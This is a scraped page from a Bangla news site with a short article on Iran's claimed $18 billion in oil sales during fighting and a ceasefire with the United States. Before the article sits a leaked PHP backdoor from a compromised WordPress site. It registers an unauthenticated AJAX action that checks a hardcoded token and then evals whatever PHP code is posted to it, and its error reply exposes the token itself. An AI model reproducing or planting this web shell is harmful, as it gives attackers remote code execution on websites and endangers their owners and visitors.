// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== যুদ্ধ ও যুদ্ধবিরতি চলাকালীন ১৮ বিলিয়ন ডলারের তেল বিক্রির দাবি ইরানের | potrikaybangladesh.com
Monday, September 21, 2026
Homeযুদ্ধ ও যুদ্ধবিরতি চলাকালীন ১৮ বিলিয়ন ডলারের তেল বিক্রির দাবি ইরানের

যুদ্ধ ও যুদ্ধবিরতি চলাকালীন ১৮ বিলিয়ন ডলারের তেল বিক্রির দাবি ইরানের

যুক্তরাষ্ট্রের সঙ্গে যুদ্ধ ও যুদ্ধবিরতি চলাকালীন ১৮ বিলিয়ন ডলারের তেল বিক্রির কথা জানাল ইরান। দেশটির তেল মন্ত্রণালয় গতকাল শনিবার তাদের ওয়েবসাইটে এক বিবৃতিতে এ তথ্য জানায়।

মন্ত্রণালয় জানায়, যুদ্ধের সময় ১১ দশমিক ৫ বিলিয়ন ডলারের তেল বিক্রি হয়েছে এবং সম্প্রতি ভেঙে যাওয়া যুদ্ধবিরতির সময়ে বিক্রি হয়েছে ৬ দশমিক ৫ বিলিয়ন ডলারের তেল। বার্তা সংস্থা এএফপির খবরে এমনটি বলা হয়েছে।

মন্ত্রণালয় আরও জানায়, সংকট থাকা সত্ত্বেও বাজেটে তেল থেকে রাজস্বের যে লক্ষ্যমাত্রা ধরা হয়েছিল, তার ৬০ শতাংশের বেশি পূরণ হয়ে গেছে।

তবে জুনের শেষ দিকে ইরানের পার্লামেন্ট স্পিকার এবং প্রধান আলোচক মোহাম্মদ বাগের গালিবাফ বলেছিলেন, বন্দরগুলোতে মার্কিন অবরোধের কারণে তারা তখন কোনো তেলই রপ্তানি করতে পারেননি।

২৮ ফেব্রুয়ারি যুক্তরাষ্ট্র ও ইসরায়েল ইরানে হামলা চালালে যুদ্ধের শুরু হয়। এর জেরে ইরানও ওই অঞ্চলে যুক্তরাষ্ট্রের মিত্র দেশগুলোর বিরুদ্ধে প্রতিশোধমূলক ব্যবস্থা নেয়।

এপ্রিলের যুদ্ধবিরতির ফলে সংঘাত প্রায় বন্ধ হয়ে গিয়েছিল, কিন্তু জুলাইয়ের শুরু থেকে পরিস্থিতি আবারও উত্তপ্ত হয়ে ওঠে। কৌশলগতভাবে গুরুত্বপূর্ণ হরমুজ প্রণালির নিয়ন্ত্রণ নিয়ে আবার যুদ্ধে জড়িয়েছে ইরান ও যুক্তরাষ্ট্র। 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments